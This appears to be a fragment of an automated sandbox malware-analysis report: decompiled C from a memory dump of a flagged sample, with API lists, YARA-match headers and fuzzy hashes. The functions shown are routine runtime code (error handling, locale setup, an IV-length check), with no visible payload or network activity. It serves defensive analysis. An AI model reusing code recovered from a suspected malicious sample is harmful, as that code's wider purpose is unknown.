                    								_t110 =  *((intOrPtr*)(_t76 + 0x48));
                    								_v44 =  *((intOrPtr*)(_t76 + 0x48));
                    								_v32 = 0;
                    								_t79 = E013FF83C( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
                    								_t138 = _t136 + 0x18;
                    								__eflags = _t79;
                    								if(_t79 == 0) {
                    									L22:
                    									_t99 = E0140131B(_t110, _v32 + 4);
                    									__eflags = _t99;
                    									if(_t99 == 0) {
                    										goto L15;
                    									} else {
                    										_t20 = _t99 + 4; // 0x4
                    										_v36 = _t20;
                    										_t110 =  &_v48;
                    										_t125 = 0;
                    										_t86 = E013FF83C( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
                    										_t138 = _t138 + 0x18;
                    										__eflags = _t86;
                    										if(_t86 == 0) {
                    											L29:
                    											_t126 = _v48;
                    											E01400941(4);
                    											_pop(_t112);
                    											_v8 = _v8 & 0x00000000;
                    											_t131 = _t130 + _t130;
                    											_t113 = _t112 | 0xffffffff;
                    											__eflags =  *(_t126 + 0x24 + _t131 * 8);
                    											if(__eflags != 0) {
                    												asm("lock xadd [edx], eax");
                    												if(__eflags == 0) {
                    													E014012E1( *(_t126 + 0x24 + _t131 * 8));
                    													_pop(_t116);
                    													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                    													_t113 = _t116 | 0xffffffff;
                    													__eflags = _t113;
                    												}
                    											}
                    											_t88 = _v40;
                    											__eflags =  *(_t88 + 0x350) & 0x00000002;
                    											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
                    												__eflags =  *0x14354b0 & 0x00000001;
                    												if(( *0x14354b0 & 0x00000001) == 0) {
                    													__eflags =  *(_t126 + 0x24 + _t131 * 8);
                    													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
                    														asm("lock xadd [eax], ecx");
                    														__eflags = _t113 == 1;
                    														if(_t113 == 1) {
                    															E014012E1( *(_t126 + 0x24 + _t131 * 8));
                    															_t51 = _t126 + 0x24 + _t131 * 8;
                    															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                    															__eflags =  *_t51;
                    														}
                    													}
                    												}
                    											}
                    											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
                    											 *(_t126 + 0x24 + _t131 * 8) = _t99;
                    											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
                    											_v8 = 0xfffffffe;
                    											E01401075();
                    										} else {
                    											__eflags = _t86 - 0x16;
                    											if(_t86 == 0x16) {
                    												L26:
                    												_push(_t125);
                    												_push(_t125);
                    												_push(_t125);
                    												_push(_t125);
                    												_push(_t125);
                    												goto L20;
                    											} else {
                    												__eflags = _t86 - 0x22;
                    												if(_t86 != 0x22) {
                    													__eflags = _t86;
                    													if(_t86 == 0) {
                    														goto L29;
                    													} else {
                    														E014012E1(_t99);
                    														goto L15;
                    													}
                    												} else {
                    													goto L26;
                    												}
                    											}
                    										}
                    									}
                    								} else {
                    									__eflags = _t79 - 0x16;
                    									if(_t79 == 0x16) {
                    										L19:
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										L20:
                    										_t79 = E013FDA8E();
                    									} else {
                    										__eflags = _t79 - 0x22;
                    										if(_t79 == 0x22) {
                    											goto L19;
                    										}
                    									}
                    									__eflags = _t79;
                    									if(_t79 != 0) {
                    										goto L15;
                    									} else {
                    										goto L22;
                    									}
                    								}
                    							} else {
                    								L15:
                    							}
                    							return E013F36A6();
                    						} else {
                    							__eflags = _t67 - 0x22;
                    							if(_t67 == 0x22) {
                    								goto L13;
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    				} else {
                    					_t70 = E014052E6(_t101, _a4, 0);
                    					L12:
                    					return _t70;
                    				}
                    			}




































                    0x01400e84
                    0x01400e84
                    0x01400e89
                    0x01400e8e
                    0x01400e9e
                    0x01400e9f
                    0x01400ea8
                    0x01400eb0
                    0x01400eb5
                    0x01400eb8
                    0x01400eba
                    0x01400ec6
                    0x01400ed0
                    0x01400ed3
                    0x01400ed4
                    0x01400ed6
                    0x01400f07
                    0x01400f08
                    0x01400f0e
                    0x00000000
                    0x01400ed8
                    0x01400ee2
                    0x01400ee7
                    0x01400eea
                    0x01400eec
                    0x01400f05
                    0x00000000
                    0x01400eee
                    0x01400eee
                    0x01400ef1
                    0x00000000
                    0x01400ef3
                    0x01400ef3
                    0x01400ef6
                    0x00000000
                    0x01400ef8
                    0x00000000
                    0x01400ef8
                    0x01400ef6
                    0x01400ef1
                    0x01400eec
                    0x01400ebc
                    0x01400ebc
                    0x01400ebf
                    0x01400f16
                    0x01400f16
                    0x01400f17
                    0x01400f18
                    0x01400f19
                    0x01400f1b
                    0x01400f20
                    0x01400f28
                    0x01400f30
                    0x01400f34
                    0x01400f3a
                    0x01400f3b
                    0x01400f3d
                    0x01400f3f
                    0x01400f48
                    0x01400f4d
                    0x01400f53
                    0x01400f56
                    0x01400f59
                    0x01400f5e
                    0x01400f6d
                    0x01400f72
                    0x01400f75
                    0x01400f77
                    0x01400f91
                    0x01400f9e
                    0x01400fa0
                    0x01400fa2
                    0x00000000
                    0x01400fa4
                    0x01400fa4
                    0x01400fa7
                    0x01400faa
                    0x01400fb5
                    0x01400fb8
                    0x01400fbd
                    0x01400fc0
                    0x01400fc2
                    0x01400fe5
                    0x01400fe5
                    0x01400fea
                    0x01400fef
                    0x01400ff0
                    0x01400ff4
                    0x01400ffa
                    0x01400ffd
                    0x01400fff
                    0x01401003
                    0x01401007
                    0x0140100d
                    0x01401012
                    0x01401013
                    0x01401018
                    0x01401018
                    0x01401018
                    0x01401007
                    0x0140101b
                    0x0140101e
                    0x01401025
                    0x01401027
                    0x0140102e
                    0x01401034
                    0x01401036
                    0x01401038
                    0x0140103c
                    0x0140103d
                    0x01401043
                    0x01401049
                    0x01401049
                    0x01401049
                    0x01401049
                    0x0140103d
                    0x01401036
                    0x0140102e
                    0x01401051
                    0x01401053
                    0x0140105a
                    0x0140105e
                    0x01401065
                    0x01400fc4
                    0x01400fc4
                    0x01400fc7
                    0x01400fce
                    0x01400fce
                    0x01400fcf
                    0x01400fd0
                    0x01400fd1
                    0x01400fd2
                    0x00000000
                    0x01400fc9
                    0x01400fc9
                    0x01400fcc
                    0x01400fd5
                    0x01400fd7
                    0x00000000
                    0x01400fd9
                    0x01400fda
                    0x00000000
                    0x01400fdf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01400fcc
                    0x01400fc7
                    0x01400fc2
                    0x01400f79
                    0x01400f79
                    0x01400f7c
                    0x01400f83
                    0x01400f83
                    0x01400f84
                    0x01400f85
                    0x01400f86
                    0x01400f87
                    0x01400f88
                    0x01400f88
                    0x01400f7e
                    0x01400f7e
                    0x01400f81
                    0x00000000
                    0x00000000
                    0x01400f81
                    0x01400f8d
                    0x01400f8f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01400f8f
                    0x01400f41
                    0x01400f41
                    0x01400f41
                    0x01401071
                    0x01400ec1
                    0x01400ec1
                    0x01400ec4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01400ec4
                    0x01400ebf
                    0x01400e90
                    0x01400e95
                    0x01400f12
                    0x01400f15
                    0x01400f15

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: __cftoe
                    • String ID:
                    • API String ID: 4189289331-0
                    • Opcode ID: b358be46b9d81b4b432490f8931d08f1fc3bc31aa94175154a5d2d9e551febcc
                    • Instruction ID: 2ac636227d9ec5d1b1b44dbe936972b51e49cf03c700fc1d3f2e02daeabb91b5
                    • Opcode Fuzzy Hash: b358be46b9d81b4b432490f8931d08f1fc3bc31aa94175154a5d2d9e551febcc
                    • Instruction Fuzzy Hash: 70512B72904205ABEB229B5F8C40FAF7BA8AF587B0F10013FF914E72E1DB75D5019664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E01406A01(void* __ebx, void* __ecx, void* __edx) {
                    				void* __esi;
                    				intOrPtr _t2;
                    				void* _t3;
                    				void* _t4;
                    				intOrPtr _t9;
                    				void* _t11;
                    				void* _t20;
                    				void* _t21;
                    				void* _t23;
                    				void* _t25;
                    				void* _t27;
                    				void* _t29;
                    				void* _t31;
                    				void* _t32;
                    				long _t36;
                    				long _t37;
                    				void* _t40;
                    
                    				_t29 = __edx;
                    				_t23 = __ecx;
                    				_t20 = __ebx;
                    				_t36 = GetLastError();
                    				_t2 =  *0x14353a4; // 0x6
                    				_t42 = _t2 - 0xffffffff;
                    				if(_t2 == 0xffffffff) {
                    					L2:
                    					_t3 = E014009B2(_t23, 1, 0x364);
                    					_t31 = _t3;
                    					_pop(_t25);
                    					if(_t31 != 0) {
                    						_t4 = E01406F75(_t25, __eflags,  *0x14353a4, _t31);
                    						__eflags = _t4;
                    						if(_t4 != 0) {
                    							E01406873(_t25, _t31, 0x143a950);
                    							E014012E1(0);
                    							_t40 = _t40 + 0xc;
                    							__eflags = _t31;
                    							if(_t31 == 0) {
                    								goto L9;
                    							} else {
                    								goto L8;
                    							}
                    						} else {
                    							_push(_t31);
                    							goto L4;
                    						}
                    					} else {
                    						_push(_t3);
                    						L4:
                    						E014012E1();
                    						_pop(_t25);
                    						L9:
                    						SetLastError(_t36);
                    						E01401369(_t20, _t29, _t36);
                    						asm("int3");
                    						_push(_t20);
                    						_push(_t36);
                    						_push(_t31);
                    						_t37 = GetLastError();
                    						_t21 = 0;
                    						_t9 =  *0x14353a4; // 0x6
                    						_t45 = _t9 - 0xffffffff;
                    						if(_t9 == 0xffffffff) {
                    							L12:
                    							_t32 = E014009B2(_t25, 1, 0x364);
                    							_pop(_t27);
                    							if(_t32 != 0) {
                    								_t11 = E01406F75(_t27, __eflags,  *0x14353a4, _t32);
                    								__eflags = _t11;
                    								if(_t11 != 0) {
                    									E01406873(_t27, _t32, 0x143a950);
                    									E014012E1(_t21);
                    									__eflags = _t32;
                    									if(_t32 != 0) {
                    										goto L19;
                    									} else {
                    										goto L18;
                    									}
                    								} else {
                    									_push(_t32);
                    									goto L14;
                    								}
                    							} else {
                    								_push(_t21);
                    								L14:
                    								E014012E1();
                    								L18:
                    								SetLastError(_t37);
                    							}
                    						} else {
                    							_t32 = E01406F1F(_t25, _t45, _t9);
                    							if(_t32 != 0) {
                    								L19:
                    								SetLastError(_t37);
                    								_t21 = _t32;
                    							} else {
                    								goto L12;
                    							}
                    						}
                    						return _t21;
                    					}
                    				} else {
                    					_t31 = E01406F1F(_t23, _t42, _t2);
                    					if(_t31 != 0) {
                    						L8:
                    						SetLastError(_t36);
                    						return _t31;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    			}




















                    0x01406a01
                    0x01406a01
                    0x01406a01
                    0x01406a0b
                    0x01406a0d
                    0x01406a12
                    0x01406a15
                    0x01406a23
                    0x01406a2a
                    0x01406a2f
                    0x01406a32
                    0x01406a35
                    0x01406a47
                    0x01406a4c
                    0x01406a4e
                    0x01406a59
                    0x01406a60
                    0x01406a65
                    0x01406a68
                    0x01406a6a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01406a50
                    0x01406a50
                    0x00000000
                    0x01406a50
                    0x01406a37
                    0x01406a37
                    0x01406a38
                    0x01406a38
                    0x01406a3d
                    0x01406a78
                    0x01406a79
                    0x01406a7f
                    0x01406a84
                    0x01406a87
                    0x01406a88
                    0x01406a89
                    0x01406a90
                    0x01406a92
                    0x01406a94
                    0x01406a99
                    0x01406a9c
                    0x01406aaa
                    0x01406ab6
                    0x01406ab9
                    0x01406abc
                    0x01406ace
                    0x01406ad3
                    0x01406ad5
                    0x01406ae0
                    0x01406ae6
                    0x01406aee
                    0x01406af0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01406ad7
                    0x01406ad7
                    0x00000000
                    0x01406ad7
                    0x01406abe
                    0x01406abe
                    0x01406abf
                    0x01406abf
                    0x01406af2
                    0x01406af3
                    0x01406af3
                    0x01406a9e
                    0x01406aa4
                    0x01406aa8
                    0x01406afb
                    0x01406afc
                    0x01406b02
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01406aa8
                    0x01406b09
                    0x01406b09
                    0x01406a17
                    0x01406a1d
                    0x01406a21
                    0x01406a6c
                    0x01406a6d
                    0x01406a77
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01406a21

                    APIs
                    • GetLastError.KERNEL32(00000000,?,013FEF5F,?,00000000,?,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A05
                    • _free.LIBCMT ref: 01406A38
                    • _free.LIBCMT ref: 01406A60
                    • SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A6D
                    • SetLastError.KERNEL32(00000000,013FECA1,00000000,00000000,00000000,00000000,0141BE7F,00000000,00000000,00000000,?), ref: 01406A79
                    • _abort.LIBCMT ref: 01406A7F
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: 35f15e8919e09d25f1951db6a5e254add6f366aadcd7c350bcbf1bbf7e9c11c5
                    • Instruction ID: 637764808445d6c7b95057627f228b990ad9ae1b77ec58c64abb016fe26cb4d8
                    • Opcode Fuzzy Hash: 35f15e8919e09d25f1951db6a5e254add6f366aadcd7c350bcbf1bbf7e9c11c5
                    • Instruction Fuzzy Hash: 8FF0F9721415022BD213723B6C08F2B1B668FE3671B23403FF506E72F4EE34C5664610
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E013CCEF0(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4) {
                    				intOrPtr _v0;
                    				char _v8;
                    				intOrPtr _v12;
                    				char _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				char _v60;
                    				char _v64;
                    				char _v88;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				char _v172;
                    				char _v196;
                    				char _v220;
                    				char _v244;
                    				char _v268;
                    				char _v292;
                    				char _v316;
                    				char _v340;
                    				char _v364;
                    				char _v388;
                    				char _v412;
                    				char _v436;
                    				intOrPtr _v440;
                    				intOrPtr _v456;
                    				char _v476;
                    				signed int _v480;
                    				void* __ebp;
                    				signed int _t64;
                    				signed int _t65;
                    				intOrPtr _t67;
                    				void* _t68;
                    				intOrPtr _t69;
                    				void* _t70;
                    				void* _t81;
                    				void* _t83;
                    				void* _t85;
                    				void* _t87;
                    				void* _t89;
                    				signed int _t94;
                    				signed int _t95;
                    				intOrPtr* _t102;
                    				void* _t103;
                    				void* _t113;
                    				void* _t115;
                    				void* _t117;
                    				void* _t119;
                    				void* _t121;
                    				intOrPtr _t126;
                    				intOrPtr* _t157;
                    				intOrPtr* _t158;
                    				void* _t162;
                    				intOrPtr* _t163;
                    				signed int _t165;
                    				signed int _t166;
                    				void* _t167;
                    				void* _t168;
                    				signed int _t170;
                    
                    				_push(0xffffffff);
                    				_push(E014167F7);
                    				_push( *[fs:0x0]);
                    				_t168 = _t167 - 0x1a8;
                    				_t64 =  *0x1435234; // 0x78d9f939
                    				_t65 = _t64 ^ _t165;
                    				_v20 = _t65;
                    				_push(__ebx);
                    				_push(__edi);
                    				_push(_t65);
                    				 *[fs:0x0] =  &_v16;
                    				_t160 = __ecx;
                    				_t126 = _a4;
                    				_t67 =  *__ecx;
                    				_v440 = _t126;
                    				if(_t126 >= 0) {
                    					_t68 =  *((intOrPtr*)(_t67 + 0x24))();
                    					__eflags = _t126 - _t68;
                    					_t69 =  *__ecx;
                    					if(_t126 < _t68) {
                    						_t158 =  *((intOrPtr*)(_t69 + 0x34))();
                    						_t126 = E013E9DA0( &_v124,  *((intOrPtr*)( *__ecx + 0x24))(), 0xa);
                    						_v8 = 0;
                    						_t160 = E013CADA0( &_v148, _v440, 0xa);
                    						_t154 =  *_t158;
                    						_t148 = _t158;
                    						_v8 = 1;
                    						_t113 =  *((intOrPtr*)( *_t158 + 8))( &_v172);
                    						_v8 = 2;
                    						_t115 = E013C1DF7(_t126, _t158,  *_t158,  &_v196, _t113, ": IV length ");
                    						_v8 = 3;
                    						_t117 = E013C1DA9(_t126, _t158, _t158,  &_v220, _t115, _t160);
                    						_v8 = 4;
                    						_t119 = E013C1DF7(_t126, _t158, _t154,  &_v244, _t117, " is less than the minimum of ");
                    						_v8 = 5;
                    						_t121 = E013C1DA9(_t126, _t148, _t158,  &_v268, _t119, _t126);
                    						_t168 = _t168 + 0x48;
                    						_v8 = 6;
                    						E013CB190(_t121);
                    						_t69 = E013F4EC6( &_v60, 0x1430adc);
                    					}
                    					_t70 =  *((intOrPtr*)(_t69 + 0x28))();
                    					__eflags = _t126 - _t70;
                    					if(_t126 <= _t70) {
                    						goto L2;
                    					} else {
                    						_t157 =  *((intOrPtr*)( *_t160 + 0x34))();
                    						_t128 = E013E9DA0( &_v292,  *((intOrPtr*)( *_t160 + 0x28))(), 0xa);
                    						_v8 = 7;
                    						_t162 = E013CADA0( &_v316, _v440, 0xa);
                    						_t151 =  *_t157;
                    						_t137 = _t157;
                    						_v8 = 8;
                    						_t81 =  *((intOrPtr*)( *_t157 + 8))( &_v340);
                    						_v8 = 9;
                    						_t83 = E013C1DF7(_t77, _t157,  *_t157,  &_v364, _t81, ": IV length ");
                    						_v8 = 0xa;
                    						_t85 = E013C1DA9(_t77, _t157, _t157,  &_v388, _t83, _t162);
                    						_v8 = 0xb;
                    						_t87 = E013C1DF7(_t128, _t157, _t151,  &_v412, _t85, " exceeds the maximum of ");
                    						_v8 = 0xc;
                    						_t89 = E013C1DA9(_t128, _t137, _t157,  &_v436, _t87, _t128);
                    						_t170 = _t168 + 0x48;
                    						_v8 = 0xd;
                    						E013CB190(_t89);
                    						E013F4EC6( &_v100, 0x1430adc);
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						_t166 = _t170;
                    						_t94 =  *0x1435234; // 0x78d9f939
                    						_t95 = _t94 ^ _t166;
                    						_v480 = _t95;
                    						 *[fs:0x0] =  &_v476;
                    						_t163 =  &_v100;
                    						__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t163 + 0x14))))(_v456, _t95, _t162,  *[fs:0x0], E01416828, 0xffffffff, _t165);
                    						if(__eflags == 0) {
                    							_t102 =  *((intOrPtr*)( *_t163 + 0x34))();
                    							_t103 =  *((intOrPtr*)( *_t102 + 8))( &_v88);
                    							_v12 = 0;
                    							E013CB230( &_v64, __eflags, _t103, _v0);
                    							_t99 = E013F4EC6( &_v64, 0x14315c4);
                    						}
                    						 *[fs:0x0] = _v20;
                    						__eflags = _v24 ^ _t166;
                    						return E013F268B(_t99, _v24 ^ _t166);
                    					}
                    				} else {
                    					_t126 =  *((intOrPtr*)(_t67 + 0x20))();
                    					L2:
                    					 *[fs:0x0] = _v16;
                    					return E013F268B(_t126, _v20 ^ _t165);
                    				}
                    			}






























































                    0x013ccef3
                    0x013ccef5
                    0x013ccf00
                    0x013ccf01
                    0x013ccf07
                    0x013ccf0c
                    0x013ccf0e
                    0x013ccf11
                    0x013ccf13
                    0x013ccf14
                    0x013ccf18
                    0x013ccf1e
                    0x013ccf20
                    0x013ccf23
                    0x013ccf25
                    0x013ccf2d
                    0x013ccf54
                    0x013ccf57
                    0x013ccf5b
                    0x013ccf5d
                    0x013ccf6c
                    0x013ccf7b
                    0x013ccf8b
                    0x013ccf9b
                    0x013ccf9d
                    0x013ccfa6
                    0x013ccfa8
                    0x013ccfac
                    0x013ccfbb
                    0x013ccfc0
                    0x013ccfcd
                    0x013ccfd2
                    0x013ccfe3
                    0x013ccfe8
                    0x013ccff5
                    0x013ccffa
                    0x013ccfff
                    0x013cd006
                    0x013cd00a
                    0x013cd018
                    0x013cd018
                    0x013cd01d
                    0x013cd020
                    0x013cd022
                    0x00000000
                    0x013cd028
                    0x013cd035
                    0x013cd047
                    0x013cd057
                    0x013cd067
                    0x013cd069
                    0x013cd072
                    0x013cd074
                    0x013cd078
                    0x013cd087
                    0x013cd08c
                    0x013cd099
                    0x013cd09e
                    0x013cd0af
                    0x013cd0b4
                    0x013cd0c1
                    0x013cd0c6
                    0x013cd0cb
                    0x013cd0d2
                    0x013cd0d6
                    0x013cd0e4
                    0x013cd0e9
                    0x013cd0ea
                    0x013cd0eb
                    0x013cd0ec
                    0x013cd0ed
                    0x013cd0ee
                    0x013cd0ef
                    0x013cd0f1
                    0x013cd104
                    0x013cd109
                    0x013cd10b
                    0x013cd113
                    0x013cd119
                    0x013cd125
                    0x013cd127
                    0x013cd12d
                    0x013cd138
                    0x013cd141
                    0x013cd149
                    0x013cd157
                    0x013cd157
                    0x013cd15f
                    0x013cd16b
                    0x013cd175
                    0x013cd175
                    0x013ccf2f
                    0x013ccf32
                    0x013ccf34
                    0x013ccf39
                    0x013ccf51
                    0x013ccf51

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CD018
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: exceeds the maximum of $ is less than the minimum of $: IV length
                    • API String ID: 2005118841-1273958906
                    • Opcode ID: fc9c426722f5ced5194d0ec0939aa6320d1aa15b47677f652a842c8091067253
                    • Instruction ID: 2ded6ae9911901fcf7499359665a2ce9fe2e46d915cac2c8a1d85db65cc4bb83
                    • Opcode Fuzzy Hash: fc9c426722f5ced5194d0ec0939aa6320d1aa15b47677f652a842c8091067253
                    • Instruction Fuzzy Hash: 2E519175A00359EFDB11EBA8CC48FDEBBBCAF19704F104599E549E3241DB749E448BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E013C361A(intOrPtr __ecx, void* __edx, void* __edi) {
                    				intOrPtr _t32;
                    				void* _t36;
                    				void* _t37;
                    				intOrPtr _t38;
                    				void* _t39;
                    
                    				_t37 = __edi;
                    				_t36 = __edx;
                    				_t32 = __ecx;
                    				_push(0x10);
                    				E013F26C2(E0141594E);
                    				_t38 = _t32;
                    				 *((intOrPtr*)(_t39 - 0x10)) = _t38;
                    				E013F0E3A(_t32, 0);
                    				 *((intOrPtr*)(_t39 - 4)) = 0;
                    				 *((intOrPtr*)(_t38 + 4)) = 0;
                    				 *((char*)(_t38 + 8)) = 0;
                    				 *((intOrPtr*)(_t38 + 0xc)) = 0;
                    				 *((char*)(_t38 + 0x10)) = 0;
                    				 *((intOrPtr*)(_t38 + 0x14)) = 0;
                    				 *((short*)(_t38 + 0x18)) = 0;
                    				 *((intOrPtr*)(_t38 + 0x1c)) = 0;
                    				 *((short*)(_t38 + 0x20)) = 0;
                    				 *((intOrPtr*)(_t38 + 0x24)) = 0;
                    				 *((char*)(_t38 + 0x28)) = 0;
                    				 *((intOrPtr*)(_t38 + 0x2c)) = 0;
                    				 *((char*)(_t38 + 0x30)) = 0;
                    				 *((char*)(_t39 - 4)) = 6;
                    				if( *((intOrPtr*)(_t39 + 8)) == 0) {
                    					E013C3761(_t39 - 0x1c, "bad locale name");
                    					 *((intOrPtr*)(_t39 - 0x1c)) = 0x141a830;
                    					E013F4EC6(_t39 - 0x1c, 0x14309cc);
                    				}
                    				E013F14F1(0, _t36, _t37, _t38,  *((intOrPtr*)(_t39 + 8)));
                    				return E013F269C(_t38);
                    			}








                    0x013c361a
                    0x013c361a
                    0x013c361a
                    0x013c361a
                    0x013c3621
                    0x013c3626
                    0x013c3628
                    0x013c362e
                    0x013c3633
                    0x013c3636
                    0x013c3639
                    0x013c363c
                    0x013c363f
                    0x013c3644
                    0x013c3647
                    0x013c364b
                    0x013c364e
                    0x013c3652
                    0x013c3655
                    0x013c3658
                    0x013c365b
                    0x013c365e
                    0x013c3665
                    0x013c366f
                    0x013c367c
                    0x013c3684
                    0x013c3684
                    0x013c368d
                    0x013c369b

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C3621
                    • std::_Lockit::_Lockit.LIBCPMT ref: 013C362E
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013C368D
                      • Part of subcall function 013C3761: ___std_exception_copy.LIBVCRUNTIME ref: 013C3793
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C3684
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: std::_$ExceptionException@8H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow___std_exception_copy
                    • String ID: bad locale name
                    • API String ID: 3907016102-1405518554
                    • Opcode ID: dccc6ee42ae5d6cd0421d2276d98e78536abf73e2d079afb7804b72397ae0ab2
                    • Instruction ID: 72c762cd8f511ea0149a37d36e8d4f0a29b49d9cad3b734c8762b9ecc7fd4b53
                    • Opcode Fuzzy Hash: dccc6ee42ae5d6cd0421d2276d98e78536abf73e2d079afb7804b72397ae0ab2
                    • Instruction Fuzzy Hash: F5015EB0905B45DEC721DF7E848058BFFF0BF28614B508A2FE58A93610D770A605CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E01403507(void* __ecx, intOrPtr _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				void* __ebp;
                    				signed int _t10;
                    				intOrPtr* _t20;
                    				signed int _t22;
                    
                    				_t10 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t10 ^ _t22;
                    				_v12 = _v12 & 0x00000000;
                    				_t12 =  &_v12;
                    				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                    				if(_t12 != 0) {
                    					_t20 = GetProcAddress(_v12, "CorExitProcess");
                    					if(_t20 != 0) {
                    						 *0x141a1a8(_a4);
                    						_t12 =  *_t20();
                    					}
                    				}
                    				if(_v12 != 0) {
                    					_t12 = FreeLibrary(_v12);
                    				}
                    				return E013F268B(_t12, _v8 ^ _t22);
                    			}









                    0x0140350e
                    0x01403515
                    0x01403518
                    0x0140351c
                    0x01403527
                    0x0140352f
                    0x01403540
                    0x01403544
                    0x0140354b
                    0x01403551
                    0x01403551
                    0x01403553
                    0x01403558
                    0x0140355d
                    0x0140355d
                    0x01403570

                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,014034FC,?,?,0140349C,?), ref: 01403527
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,014034FC,?,?,0140349C,?), ref: 0140353A
                    • FreeLibrary.KERNEL32(00000000,?,?,?,014034FC,?,?,0140349C,?), ref: 0140355D
                    Strings
                    Memory Dump Source
